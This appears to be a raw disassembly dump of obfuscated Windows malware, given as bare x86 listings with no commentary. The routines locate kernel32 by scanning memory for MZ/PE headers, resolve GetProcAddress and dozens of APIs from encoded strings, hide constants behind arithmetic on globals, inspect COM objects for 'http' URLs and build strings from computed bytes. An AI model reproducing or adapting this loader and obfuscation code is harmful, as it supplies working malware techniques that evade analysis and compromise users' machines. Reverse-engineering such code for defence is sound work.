jnz short loc_41C165
movsx eax, [ebp+var_FE]
mov edx, ds:10013238h
add edx, 1Ch
movsx ecx, word ptr ds:1001327Ch
add edx, ecx
sub eax, edx
mov [ebp+var_30D], al
movzx eax, [ebp+var_30D]
push eax
push 0
call sub_42291E
add esp, 8
mov eax, ds:10013204h
dec eax
mov ds:1000F620h, eax
loc_41C165: ; CODE XREF: sub_41BF88+19D�j
mov eax, ds:10013284h
cmp [ebp+eax+var_108], 67h
jnz short loc_41C1C6
mov eax, ds:100131D0h
add eax, ds:1001325Ch
mov edx, ds:10013148h
movsx ecx, word ptr ds:1001322Ch
add edx, ecx
sub edx, 9
mov [ebp+eax+var_104], dl
lea eax, [ebp+var_FE]
push eax
call dword ptr ds:1000D054h
mov [ebp-310h], eax
push eax
push 10012670h
call sub_41CFF0
add esp, 0Ch
mov eax, ds:100131D0h
sub eax, 7
mov ds:1000F620h, eax
loc_41C1C6: ; CODE XREF: sub_41BF88+1EA�j
pop edi
leave
retn
sub_41BF88 endp
; ---------------------------------------------------------------------------
db 0B8h, 1, 40h
dd 10C28000h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C1D1 proc near ; CODE XREF: sub_41E6CD+CD�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 10013310h
push 100132D0h
push [ebp+arg_4]
push [ebp+arg_0]
call sub_424931
pop ebp
retn
sub_41C1D1 endp
; =============== S U B R O U T I N E =======================================
sub_41C1EB proc near ; CODE XREF: .data:00421023�p
push edi
push 10014816h
call sub_41E914
pop ecx
push eax
call dword ptr ds:1000F5E8h
mov ds:1001329Ch, eax
test eax, eax
jnz short loc_41C21E
push 10014808h
call sub_41E914
pop ecx
push eax
call dword ptr ds:10010244h
mov ds:1001329Ch, eax
loc_41C21E: ; CODE XREF: sub_41C1EB+1A�j
push 100147F5h
call sub_41E914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:1001260Ch, eax
push 100147E2h
call sub_41E914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:1001164Ch, eax
push 100147D0h
call sub_41E914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:1000F618h, eax
push 100147BFh
call sub_41E914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:10010224h, eax
push 100147ABh
call sub_41E914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:1000D050h, eax
push 1001479Ah
call sub_41E914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:1000E010h, eax
push 10014783h
call sub_41E914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:1000F5F4h, eax
push 10014774h
call sub_41E914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:10011630h, eax
push 10014767h
call sub_41E914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:1000D004h, eax
push 10014755h
call sub_41E914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:10012628h, eax
push 10014744h
call sub_41E914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:10012654h, eax
push 10014732h
call sub_41E914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:10012BA4h, eax
push 10014723h
call sub_41E914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:10010220h, eax
push 10014716h
call sub_41E914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:10012620h, eax
push 10014707h
call sub_41E914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:10012644h, eax
push 100146F9h
call sub_41E914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:1000D040h, eax
push 100146E7h
call sub_41E914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:1000F0DCh, eax
push 100146D7h
call sub_41E914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:1000D014h, eax
push 100146CBh
call sub_41E914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:1000FA40h, eax
push 100146BFh
call sub_41E914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:10012604h, eax
push 100146ADh
call sub_41E914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:1000F5FCh, eax
push 1001469Bh
call sub_41E914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:10012658h, eax
push 1001468Dh
call sub_41E914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:1001265Ch, eax
push 10014679h
call sub_41E914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:1001277Ch, eax
push 10014668h
call sub_41E914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:1001263Ch, eax
push 10014652h
call sub_41E914
add esp, 68h
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:1000D048h, eax
pop edi
retn
sub_41C1EB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C4FB proc near ; CODE XREF: sub_41E6CD+20�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 4
push 1000h
push [ebp+arg_0]
push 0
call dword ptr ds:10010248h
pop ebp
retn
sub_41C4FB endp
; =============== S U B R O U T I N E =======================================
sub_41C512 proc near ; CODE XREF: .data:00422EA2�p
push edi
push 10014644h
call sub_41E914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10012664h, eax
push 1001463Ch
call sub_41E914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1000E00Ch, eax
push 10014628h
call sub_41E914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1000F5E8h, eax
push 10014618h
call sub_41E914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10010244h, eax
push 10014609h
call sub_41E914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10012788h, eax
push 100145FAh
call sub_41E914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1000D008h, eax
push 100145E8h
call sub_41E914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10012B9Ch, eax
push 100145DBh
call sub_41E914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10012B8Ch, eax
push 100145CCh
call sub_41E914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10011654h, eax
push 100145BDh
call sub_41E914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10012624h, eax
push 100145B1h
call sub_41E914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1000D000h, eax
push 100145A6h
call sub_41E914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1000F0E0h, eax
push 1001458Fh
call sub_41E914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1000D00Ch, eax
push 10014578h
call sub_41E914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10012640h, eax
push 10014562h
call sub_41E914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10012608h, eax
push 10014552h
call sub_41E914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1000D034h, eax
push 10014546h
call sub_41E914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1000D028h, eax
push 10014536h
call sub_41E914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10010248h, eax
push 10014527h
call sub_41E914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10011634h, eax
push 10014519h
call sub_41E914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1000FA34h, eax
push 1001450Ch
call sub_41E914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1000F61Ch, eax
push 100144FBh
call sub_41E914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1001025Ch, eax
push 100144EAh
call sub_41E914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1000D02Ch, eax
push 100144DAh
call sub_41E914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10012770h, eax
push 100144C8h
call sub_41E914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10010258h, eax
push 100144B7h
call sub_41E914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1000E004h, eax
push 100144AAh
call sub_41E914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1000F60Ch, eax
push 10014499h
call sub_41E914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10012668h, eax
push 10014484h
call sub_41E914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10012650h, eax
push 10014474h
call sub_41E914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1000E000h, eax
push 1001445Fh
call sub_41E914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1000F0D4h, eax
push 10014452h
call sub_41E914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10010364h, eax
push 10014442h
call sub_41E914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1001261Ch, eax
push 10014434h
call sub_41E914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10011648h, eax
push 1001441Eh
call sub_41E914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1001163Ch, eax
push 10014407h
call sub_41E914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1000F600h, eax
push 100143EFh
call sub_41E914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1000FA3Ch, eax
push 100143D7h
call sub_41E914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1000D010h, eax
push 100143BEh
call sub_41E914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10012614h, eax
push 100143ABh
call sub_41E914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10012780h, eax
push 10014393h
call sub_41E914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10012778h, eax
push 10014382h
call sub_41E914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10012B98h, eax
push 10014370h
call sub_41E914
add esp, 0ACh
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1000F5F8h, eax
pop edi
retn
sub_41C512 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C9D0 proc near ; CODE XREF: .data:00422E5A�p
var_28C = dword ptr -28Ch
var_288 = dword ptr -288h
var_281 = byte ptr -281h
var_26C = byte ptr -26Ch
var_252 = byte ptr -252h
var_23D = byte ptr -23Dh
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_21F = byte ptr -21Fh
var_21E = byte ptr -21Eh
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_103 = byte ptr -103h
var_102 = byte ptr -102h
var_101 = byte ptr -101h
var_FE = byte ptr -0FEh
var_FD = byte ptr -0FDh
var_FC = byte ptr -0FCh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
movsx esi, word ptr ds:100131B4h
mov edx, ds:10013280h
lea ecx, [esi+edx+8]
shr edi, cl
mov esi, ds:10013270h
add esi, 0Ah
add esi, ds:10013198h
mov ecx, esi
mov ebx, edi
shl ebx, cl
loc_41CA07: ; CODE XREF: sub_41C9D0+5D�j
; sub_41C9D0+99�j ...
mov [ebp+var_114], ebx
mov eax, ebx
cmp word ptr [eax], 5A4Dh
jz short loc_41CA2F
movsx eax, word ptr ds:100130BCh
movsx edx, word ptr ds:10013104h
lea eax, [eax+edx+0FFEFh]
sub ebx, eax
jmp short loc_41CA07
; ---------------------------------------------------------------------------
loc_41CA2F: ; CODE XREF: sub_41C9D0+44�j
movsx eax, word ptr ds:10013230h
mov edx, ds:100131D4h
lea eax, [eax+edx+34h]
mov edx, ebx
add edx, eax
mov [ebp+var_10C], edx
mov eax, edx
mov edx, ebx
add edx, [eax]
mov [ebp+var_118], edx
mov eax, [ebp+arg_0]
cmp edx, eax
jbe short loc_41CA6B
mov eax, ds:100131F4h
add eax, 0FFFCh
sub ebx, eax
jmp short loc_41CA07
; ---------------------------------------------------------------------------
loc_41CA6B: ; CODE XREF: sub_41C9D0+8B�j
mov eax, [ebp+var_118]
mov [ebp+var_11C], eax
movzx eax, word ptr [eax]
cmp eax, 4550h
jz short loc_41CA98
mov eax, ds:100130ECh
add eax, 0FFFBh
add eax, ds:100130F0h
sub ebx, eax
jmp loc_41CA07
; ---------------------------------------------------------------------------
loc_41CA98: ; CODE XREF: sub_41C9D0+AF�j
mov eax, [ebp+var_11C]
mov eax, [eax+78h]
mov [ebp+var_120], eax
mov ecx, ebx
add ecx, eax
mov [ebp+var_110], ecx
mov eax, ecx
mov edx, ebx
add edx, [eax+0Ch]
push edx
lea eax, [ebp+var_103]
push eax
call sub_425399
mov eax, ds:1001325Ch
add eax, ds:10013138h
sub eax, 8
mov [ebp+var_4], eax
jmp short loc_41CAFA
; ---------------------------------------------------------------------------
loc_41CAD8: ; CODE XREF: sub_41C9D0+140�j
mov eax, [ebp+var_4]
mov al, [ebp+eax+var_103]
cmp al, 61h
jle short loc_41CAF7
cmp al, 7Ah
jge short loc_41CAF7
mov eax, [ebp+var_4]
lea eax, [ebp+eax+var_103]
sub byte ptr [eax], 20h
loc_41CAF7: ; CODE XREF: sub_41C9D0+114�j
; sub_41C9D0+118�j
inc [ebp+var_4]
loc_41CAFA: ; CODE XREF: sub_41C9D0+106�j
mov eax, [ebp+var_4]
movsx eax, [ebp+eax+var_103]
mov edx, ds:100130A0h
sub edx, 4
cmp eax, edx
jnz short loc_41CAD8
cmp [ebp+var_103], 4Bh
jnz short loc_41CB48
cmp [ebp+var_102], 45h
jnz short loc_41CB48
cmp [ebp+var_101], 52h
jnz short loc_41CB48
cmp [ebp+var_FE], 4Ch
jnz short loc_41CB48
cmp [ebp+var_FD], 33h
jnz short loc_41CB48
cmp [ebp+var_FC], 32h
jz short loc_41CB4D
loc_41CB48: ; CODE XREF: sub_41C9D0+149�j
; sub_41C9D0+152�j ...
jmp loc_41CD7C
; ---------------------------------------------------------------------------
loc_41CB4D: ; CODE XREF: sub_41C9D0+176�j
movsx eax, word ptr ds:10013264h
add eax, ds:10013248h
sub eax, 9
mov [ebp+var_108], eax
jmp loc_41CD67
; ---------------------------------------------------------------------------
loc_41CB68: ; CODE XREF: sub_41C9D0+3A6�j
mov eax, [ebp+var_108]
movsx ecx, word ptr ds:10013218h
dec ecx
mul ecx
mov [ebp+var_228], eax
mov edx, ebx
add edx, eax
mov eax, [ebp+var_110]
add edx, [eax+20h]
mov [ebp+var_10C], edx
mov eax, edx
mov edx, ebx
add edx, [eax]
mov [ebp+var_224], edx
push edx
lea eax, [ebp+var_21F]
push eax
call sub_425399
movsx eax, word ptr ds:10013240h
mov edx, eax
add edx, ds:10013238h
cmp byte ptr [ebp+edx+var_224+3], 47h
jnz loc_41CD61
mov edx, ds:100130A0h
add edx, ds:10013120h
cmp byte ptr [ebp+edx+var_228+2], 74h
jnz loc_41CD61
cmp [ebp+eax+var_21E], 50h
jnz loc_41CD61
movsx eax, word ptr ds:10013178h
movsx edx, word ptr ds:100130C0h
add eax, edx
cmp [ebp+eax+var_21F], 63h
jnz loc_41CD61
mov eax, ds:10013234h
add eax, ds:10013154h
cmp byte ptr [ebp+eax+var_224+1], 41h
jnz loc_41CD61
mov eax, ds:100131A0h
add eax, 2
add eax, ds:1001323Ch
cmp [ebp+eax+var_21F], 72h
jnz loc_41CD61
mov eax, [ebp+var_108]
mov ecx, ds:10013194h
sub ecx, 7
mul ecx
mov [ebp+var_288], eax
mov edx, ebx
add edx, eax
mov eax, [ebp+var_110]
add edx, [eax+24h]
mov [ebp+var_114], edx
movzx eax, word ptr [edx]
mov [ebp+var_22C], eax
movsx ecx, word ptr ds:10013144h
sub ecx, 2
mul ecx
mov [ebp+var_28C], eax
mov edx, ebx
add edx, eax
mov eax, [ebp+var_110]
add edx, [eax+1Ch]
mov [ebp+var_10C], edx
mov eax, edx
mov edx, ebx
add edx, [eax]
mov [ebp+var_230], edx
mov ds:10013294h, ebx
mov ds:1000F1F8h, edx
lea edi, [ebp+var_23D]
lea esi, ds:100137C8h
mov ecx, 0Dh
rep movsb
lea edi, [ebp+var_252]
lea esi, ds:100137D5h
mov ecx, 15h
rep movsb
lea edi, [ebp+var_26C]
lea esi, ds:100137EAh
mov ecx, 0Dh
rep movsw
lea edi, [ebp+var_281]
lea esi, ds:10013804h
mov ecx, 15h
rep movsb
lea eax, [ebp+var_23D]
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10012B90h, eax
lea eax, [ebp+var_252]
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10012660h, eax
lea eax, [ebp+var_26C]
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1000E008h, eax
lea eax, [ebp+var_281]
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10011650h, eax
jmp short loc_41CD7C
; ---------------------------------------------------------------------------
loc_41CD61: ; CODE XREF: sub_41C9D0+1F1�j
; sub_41C9D0+20B�j ...
inc [ebp+var_108]
loc_41CD67: ; CODE XREF: sub_41C9D0+193�j
mov eax, [ebp+var_110]
mov eax, [eax+18h]
cmp [ebp+var_108], eax
jb loc_41CB68
loc_41CD7C: ; CODE XREF: sub_41C9D0:loc_41CB48�j
; sub_41C9D0+38F�j
pop edi
pop esi
pop ebx
leave
retn
sub_41C9D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CD81 proc near ; CODE XREF: .data:0042333F�p
var_10034 = dword ptr -10034h
var_10030 = byte ptr -10030h
var_1002C = dword ptr -1002Ch
var_10028 = dword ptr -10028h
var_10024 = dword ptr -10024h
var_10020 = byte ptr -10020h
var_10018 = dword ptr -10018h
var_10010 = dword ptr -10010h
var_1000C = dword ptr -1000Ch
var_10008 = dword ptr -10008h
var_10003 = byte ptr -10003h
var_10002 = byte ptr -10002h
var_10001 = byte ptr -10001h
var_10000 = byte ptr -10000h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10034h
call sub_425379
push ebx
push esi
push edi
cmp dword ptr ds:10013370h, 0
jnz short loc_41CDB1
mov eax, ds:100130D4h
add eax, ds:10013280h
cmp ds:1000F620h, eax
jb loc_41CFEB
loc_41CDB1: ; CODE XREF: sub_41CD81+17�j
lea eax, [ebp+var_10020]
push eax
call dword ptr ds:1000D038h
lea eax, [ebp+var_10030]
push eax
lea eax, [ebp+var_10020]
push eax
push 9
mov eax, ds:10013148h
sub eax, 2
push eax
push [ebp+arg_0]
call dword ptr ds:10010254h
mov edi, eax
mov eax, ds:100130F4h
sub eax, 7
cmp edi, eax
jnz loc_41CFEB
mov esi, [ebp+var_10018]
and [ebp+var_1000C], 0
lea eax, [ebp+var_1000C]
push eax
push 10014AD8h
push esi
mov edx, [esi]
call dword ptr ds:0[edx]
mov edi, eax
movsx eax, word ptr ds:100131F0h
sub eax, 3
cmp edi, eax
jnz loc_41CFEB
lea eax, [ebp+var_10024]
push eax
mov eax, [ebp+var_1000C]
push eax
mov edx, [eax]
call dword ptr [edx+78h]
mov edi, eax
mov eax, ds:100131A0h
sub eax, 3
cmp edi, eax
jnz loc_41CFE5
lea eax, [ebp+var_10003]
push eax
push [ebp+var_10024]
call sub_41E841
add esp, 8
mov edx, eax
inc edx
mov [ebp+var_10034], edx
push [ebp+var_10024]
call dword ptr ds:10012BA0h
cmp [ebp+var_10003], 68h
jnz short loc_41CE9C
cmp [ebp+var_10002], 74h
jnz short loc_41CE9C
cmp [ebp+var_10001], 74h
jnz short loc_41CE9C
cmp [ebp+var_10000], 70h
jz short loc_41CEA1
loc_41CE9C: ; CODE XREF: sub_41CD81+FE�j
; sub_41CD81+107�j ...
jmp loc_41CFE5
; ---------------------------------------------------------------------------
loc_41CEA1: ; CODE XREF: sub_41CD81+119�j
lea eax, [ebp+var_10010]
push eax
mov eax, [ebp+var_1000C]
push eax
mov edx, [eax]
call dword ptr [edx+48h]
mov edi, eax
mov eax, ds:10013164h
movsx edx, word ptr ds:10013170h
add eax, edx
sub eax, 6
cmp edi, eax
jnz loc_41CFE5
lea eax, [ebp+var_4]
push eax
push 10014A58h
mov eax, [ebp+var_10010]
push eax
mov edx, [eax]
call dword ptr ds:0[edx]
mov edi, eax
movsx eax, word ptr ds:10013264h
add eax, ds:100131F8h
sub eax, 0Ch
cmp edi, eax
jnz loc_41CFD9
lea eax, [ebp+var_10008]
push eax
mov eax, [ebp+var_4]
push eax
mov edx, [eax]
call dword ptr [edx+1B0h]
mov edi, eax
movsx eax, word ptr ds:10013150h
add eax, ds:100131ECh
sub eax, 10h
cmp edi, eax
jnz loc_41CFD0
lea eax, [ebp+var_10028]
push eax
mov eax, [ebp+var_10008]
push eax
mov edx, [eax]
call dword ptr [edx+70h]
mov edi, eax
mov eax, ds:100130F8h
add eax, ds:10013110h
sub eax, 0Ch
cmp edi, eax
jz short loc_41CF64
mov eax, [ebp+var_10008]
push eax
mov eax, [eax]
call dword ptr [eax+8]
jmp short loc_41CFD0
; ---------------------------------------------------------------------------
loc_41CF64: ; CODE XREF: sub_41CD81+1D3�j
xor ebx, ebx
mov eax, [ebp+var_10028]
cmp [ebp+var_10008], eax
jz short loc_41CF77
xor ebx, ebx
inc ebx
loc_41CF77: ; CODE XREF: sub_41CD81+1F1�j
mov eax, [ebp+var_10008]
push eax
mov eax, [eax]
call dword ptr [eax+8]
mov eax, [ebp+var_10028]
push eax
mov eax, [eax]
call dword ptr [eax+8]
or ebx, ebx
jnz short loc_41CFD0
lea eax, [ebp+var_1002C]
push eax
mov eax, [ebp+var_4]
push eax
mov edx, [eax]
call dword ptr [edx+20h]
mov edi, eax
mov eax, ds:10013268h
sub eax, 4
cmp edi, eax
jnz short loc_41CFD0
push [ebp+var_1002C]
push [ebp+var_4]
call nullsub_1
push [ebp+var_1002C]
push [ebp+var_4]
call sub_422477
add esp, 10h
loc_41CFD0: ; CODE XREF: sub_41CD81+1A8�j
; sub_41CD81+1E1�j ...
mov eax, [ebp+var_4]
push eax
mov eax, [eax]
call dword ptr [eax+8]
loc_41CFD9: ; CODE XREF: sub_41CD81+17B�j
mov eax, [ebp+var_10010]
push eax
mov eax, [eax]
call dword ptr [eax+8]
loc_41CFE5: ; CODE XREF: sub_41CD81+C7�j
; sub_41CD81:loc_41CE9C�j ...
push esi
mov eax, [esi]
call dword ptr [eax+8]
loc_41CFEB: ; CODE XREF: sub_41CD81+2A�j
; sub_41CD81+6B�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41CD81 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CFF0 proc near ; CODE XREF: sub_41BF88+229�p
; sub_41D354+37B�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
push edi
mov esi, [ebp+arg_4]
inc esi
movsx edi, word ptr ds:10013208h
mov eax, esi
test eax, eax
jge short loc_41D00F
add eax, 0FFh
loc_41D00F: ; CODE XREF: sub_41CFF0+18�j
sar eax, 8
mov ebx, eax
imul ebx, ds:10013128h
lea edi, [edi+ebx+1Ah]
mov [ebp+var_8], edi
mov edi, ds:10013280h
add edi, 11h
mov eax, esi
test eax, eax
jge short loc_41D036
add eax, 0FFh
loc_41D036: ; CODE XREF: sub_41CFF0+3F�j
sar eax, 8
mov ebx, ds:10013270h
add ebx, 0Dh
mov edx, eax
imul edx, ebx
add edi, edx
mov [ebp+var_C], edi
mov edi, ds:10013254h
add edi, 18h
mov eax, esi
test eax, eax
jge short loc_41D060
add eax, 0FFFFh
loc_41D060: ; CODE XREF: sub_41CFF0+69�j
sar eax, 10h
mov ebx, ds:10013138h
add ebx, 17h
mov edx, eax
imul edx, ebx
add edi, edx
mov [ebp+var_10], edi
mov eax, esi
mul [ebp+var_8]
mov [ebp+var_1C], eax
and eax, 0FFh
push eax
call sub_41B767
mov ebx, eax
mov [ebp+var_1], bl
mov eax, ds:10013134h
add eax, ds:10013220h
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_41F699
mov ebx, eax
mov [ebp+var_11], bl
mov eax, esi
mul [ebp+var_C]
mov [ebp+var_20], eax
and eax, 0FFh
push eax
call sub_41B767
mov ebx, eax
mov [ebp+var_12], bl
mov eax, ds:100131A0h
add eax, 6Eh
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_41F699
mov ebx, eax
mov [ebp+var_13], bl
mov eax, esi
and eax, 0FFh
push eax
call sub_41B767
mov ebx, eax
mov [ebp+var_14], bl
mov eax, ds:100131ACh
add eax, 2Ah
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_41F699
mov ebx, eax
mov [ebp+var_15], bl
mov eax, esi
mul [ebp+var_10]
mov [ebp+var_24], eax
and eax, 0FFh
push eax
call sub_41B767
mov ebx, eax
mov [ebp+var_16], bl
mov eax, ds:1001314Ch
add eax, 40h
movsx edx, word ptr ds:10013100h
add eax, edx
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_41F699
mov ebx, eax
mov [ebp+var_17], bl
movsx eax, word ptr ds:10013240h
add eax, 41h
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_41B767
add esp, 24h
mov ebx, eax
mov [ebp+var_18], bl
movzx edi, [ebp+var_1]
mov eax, edi
shr eax, 1
mov esi, ds:1001319Ch
add esi, ds:1001312Ch
sub esi, 0Ch
mul esi
mov [ebp+var_28], eax
mov esi, eax
cmp esi, edi
jnz short loc_41D1E4
push 10014356h
call sub_41E914
movzx edi, [ebp+var_18]
push edi
movzx edi, [ebp+var_17]
push edi
movzx edi, [ebp+var_16]
push edi
movzx edi, [ebp+var_15]
push edi
movzx edi, [ebp+var_14]
push edi
movzx edi, [ebp+var_13]
push edi
movzx edi, [ebp+var_12]
push edi
movzx edi, [ebp+var_11]
push edi
movzx edi, [ebp+var_1]
push edi
push eax
push [ebp+arg_0]
call dword ptr ds:10012634h
add esp, 30h
jmp short loc_41D228
; ---------------------------------------------------------------------------
loc_41D1E4: ; CODE XREF: sub_41CFF0+1AC�j
push 1001433Bh
call sub_41E914
movzx edi, [ebp+var_18]
push edi
movzx edi, [ebp+var_17]
push edi
movzx edi, [ebp+var_16]
push edi
movzx edi, [ebp+var_15]
push edi
movzx edi, [ebp+var_14]
push edi
movzx edi, [ebp+var_13]
push edi
movzx edi, [ebp+var_12]
push edi
movzx edi, [ebp+var_11]
push edi
movzx edi, [ebp+var_1]
push edi
push eax
push [ebp+arg_0]
call dword ptr ds:10012634h
add esp, 30h
loc_41D228: ; CODE XREF: sub_41CFF0+1F2�j
pop edi
pop esi
pop ebx
leave
retn
sub_41CFF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D22D proc near ; CODE XREF: .data:00421921�p
var_7 = byte ptr -7
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
mov ebx, [ebp+arg_4]
mov esi, [ebp+arg_8]
mov eax, ebx
add eax, 2
mov ecx, 3
mov edx, 0AAAAAAABh
mul edx
shr edx, 1
mov [ebp+var_4], edx
mov edi, edx
shl edi, 2
mov edx, [ebp+arg_C]
dec edx
cmp edi, edx
jbe short loc_41D2A0
xor eax, eax
jmp loc_41D34F
; ---------------------------------------------------------------------------
loc_41D265: ; CODE XREF: sub_41D22D+83�j
push esi
push [ebp+arg_0]
call sub_421D3F
add esp, 8
